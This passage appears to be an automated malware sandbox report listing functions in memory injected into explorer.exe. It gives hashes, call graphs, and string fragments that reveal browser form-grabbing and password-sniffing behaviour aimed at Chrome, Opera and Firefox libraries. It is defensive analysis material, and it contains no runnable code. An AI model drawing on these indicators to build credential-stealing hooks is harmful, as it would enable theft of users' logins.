                                                                                                                                                                                  • Instruction ID: d31a621b62d2a304ce8aa920df1e9b744be985cf3faf8a0196d7a3495094dd69
                                                                                                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D901127051CA188FDB84EF5CE048B2577E0EB58315F1545AED85DCB266C670D8818B81
                                                                                                                                                                                  Function 0FBA55B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 412 fba55b2-fba55ea 413 fba560a-fba562b socket 412->413 414 fba55ec-fba5604 call fba8942 412->414 414->413
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                  • String ID: sock
                                                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                  • Instruction ID: aef865550df478dff00008893465f37252b04127970600214c5b64aba6cb8f9b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A012C70618A188FCB84EF5CE048B54BBE0FB59314F1545AEE85ECB266C7B4C9818B86
                                                                                                                                                                                  Function 0FB9D2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 417 fb9d2dd-fb9d320 call fba8942 420 fb9d3fa-fb9d40e 417->420 421 fb9d326 417->421 422 fb9d328-fb9d339 SleepEx 421->422 422->422 423 fb9d33b-fb9d341 422->423 424 fb9d34b-fb9d352 423->424 425 fb9d343-fb9d349 423->425 427 fb9d370-fb9d376 424->427 428 fb9d354-fb9d35a 424->428 425->424 426 fb9d35c-fb9d36a call fba7f12 425->426 426->427 429 fb9d378-fb9d37e 427->429 430 fb9d3b7-fb9d3bd 427->430 428->426 428->427 429->430 432 fb9d380-fb9d38a 429->432 433 fb9d3bf-fb9d3cf call fb9de72 430->433 434 fb9d3d4-fb9d3db 430->434 432->430 436 fb9d38c-fb9d3b1 call fb9e432 432->436 433->434 434->422 438 fb9d3e1-fb9d3f5 call fb9d0f2 434->438 436->430 438->422
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                  • Instruction ID: 5910a066e271d834763366acbb5a5f1f60b324319c85736512f124058009fbab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 17315AB4A1CB09DADF64AF2AA0482E5F7A0FB58301F9442BEC95DCA107CB34A050CF91
                                                                                                                                                                                  Function 0FB9D412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 453 fb9d412-fb9d446 call fba8942 456 fb9d448-fb9d472 call fbaac9e CreateThread 453->456 457 fb9d473-fb9d47d 453->457
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                  • Instruction ID: bda1bce2d68140a985be34c3f6f6269300718c4e96adcdeb5ef5955720251051
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF0FC30268B484FD784EF6CD44563AF3D0FBEC215F44057E954DC3265DA39D5414B16

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 0F6EED02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                  • API String ID: 0-393284711
                                                                                                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                  • Instruction ID: e596fd3390db3ab99b545a68bd8c50a943b544326a4cf27dd19118f81a498211
                                                                                                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE15770618F488FC764EF68C4847EAB7E0FB58301F904A2E95ABC7256DF34A545CB89
                                                                                                                                                                                  Function 0F6F1792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                  • API String ID: 0-2916316912
                                                                                                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                  • Instruction ID: 3b6e785341dd5b02ea72f16d48f921f65095d398602ab938076071bc661217d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                  • Instruction Fuzzy Hash: 11B18930518B488EDB59EF68C485AEEB7F1FF98300F50451ED59AC7262EF74A4098B86
                                                                                                                                                                                  Function 0F6EF622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                  • Instruction ID: 9d00f87e2a6c4da93143e814677d0597860f6f0ae138e2fd0b3dc509dd4b7880
                                                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A41BD71A18B08CFDF14DF88A4456AE7BE2FB88700F40425ED809D7386DBB5AD458BD6
                                                                                                                                                                                  Function 0F6F6AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                  • Instruction ID: 041c95fcb9f22358147d143e0c910f78a95576cad842f058d6dad9fa762df281
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89C15B71218B098FC758EF28C885AEAF7E1FB94304F40472E959AC7211DF34A519CB8A
                                                                                                                                                                                  Function 0F6F6F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                  • Instruction ID: be68f983cf0e51cf8cfdd007171d345ffe6df7040e4275d60d0cd3770e9445e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A51F37051C7488FD719DF18D8812AAB7E5FBC5700F501A2EE9CBC7242DBB4990ACB82
                                                                                                                                                                                  Function 0F6F02F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                  • Instruction ID: d4c7a65a8e9554b4d0753790d45ddbd14bec8b42ef6c390ed46cb5e53da9cb9d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCC1A171618B198FC758EF68D455AEAB3E1FB98300F90432D851EC7256DF34A909CBC9
                                                                                                                                                                                  Function 0F6F02F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                  • Instruction ID: e30b9cba912bf06dfef7676ae9e312bb7109a6820e60d6320d0a619e6808b3a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBC1A071618B198FC758EF68D495AAAB3E1FB98300F90432D850EC7256DF34A909CB89
                                                                                                                                                                                  Function 0F6F1CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                  • Instruction ID: 3dd97ebb651ad31ce46b57e13525f19f979effd147375b93f70a672bad91d16e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86A1BF706187488FDB19EFA894447EEB7E1FF88300F40462ED58AD7292EF749549CB89
                                                                                                                                                                                  Function 0F6F1CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                  • Instruction ID: 554ae2bc7dc9b04bd1b8ff57468bcdcd5936ca4d572d0c73af90e2e3511c1874
                                                                                                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC91AF706187488FDB18EFA8D444BEEB7E1FB98300F40462ED58AD7252EF749549CB89
                                                                                                                                                                                  Function 0F6F1352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                  • Instruction ID: dca1592bca68c5f563ed651a1f1e45faffd1bb22a5fdde658b004a21dee63c98
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5071C5716187498FD758EF68C4847AAB7F1FF99304F00062ED54AC7222EF74E9498B85
                                                                                                                                                                                  Function 0F6ECC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                  • Instruction ID: 700e870036a4e0a30eabb96694327b604d6af0409252c7e6ab1b1b4b6e15ad3e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0515AB0918B4D8FDB64EFA4C044AEEB7F1FF68300F40462E959AE7215EF3095458B89
                                                                                                                                                                                  Function 0F6ED86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                  • Instruction ID: c206ad14bdf70abf2d3d042c5f74b63517a4e11c8c118ba719d9b3655bcaa519
                                                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D416F31219B488BCB65EF38D8457EAB3E4FB98301F40462E999EC7245EF30D6498786
                                                                                                                                                                                  Function 0F6EF4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                  • Instruction ID: 306212883814fa0a7e97bcce8e33d0afbc3961caac618f4d5ef3fda87daf3386
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89416031A19F0D8FCB94EF6884947ED77E1FB78300F64416AA80ED7311DA75D9418B86
                                                                                                                                                                                  Function 0F6ED432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                  • Instruction ID: 7f4261cf69455eded347e4f77d92d6f83b7c9df7be6dbe4cb3666f1507c7a899
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B641BF71608B488FD7A8DF2880843BAB7E1FBA8304F504A2E959EC7266DF70D445CB81
                                                                                                                                                                                  Function 0F6F40B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                  • Instruction ID: 1e164df10196322304f2ee6e98425f4ee17f4cf8681aa3e1bfb8cfc81f9a13ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531203050DB886FD71AEB28C4846EAB7D4FB94300F50491EE59BC7252EE34A50ECB47
                                                                                                                                                                                  Function 0F6F40C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                  • Instruction ID: f0053e1a1f0a547b142de00e3a9b3c43ca1d48e08bb2060f866a9c233d6302b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531F27151CB486FD719EF28C4846EAB7D4FB94300F40491EE59BC3252EE34E50ACA47
                                                                                                                                                                                  Function 0F6EFFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                  • Instruction ID: dd65152f63021ce8f0a67be1f3f763d99cf2047faa42e0d2bdc72d20070d5c43
                                                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E318F71218B488FCB84EF688494BAAB7E1FF98300F94466D954ECB316DF34D909CB56
                                                                                                                                                                                  Function 0F6EFFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                  • Instruction ID: ff5917a566f22be41f5c4d70227ea17a867534f93c15b2045ece7322484b7978
                                                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                  • Instruction Fuzzy Hash: C431AE71218B488FCB84EF688494BAAB7E1FF98300F94462D954ECB356DF34C909CB56
                                                                                                                                                                                  Function 0F6F28C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                  • Instruction ID: 533d470505412cdf999be3c4e9946149e3d0acadfa0ebd8ce786bb17fa1b9f27
                                                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7931CE31614B0D8FCB04EFA8C8947EEBBE0FF58204F40422ED95ED7251DE7886498B89
                                                                                                                                                                                  Function 0F6F28BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
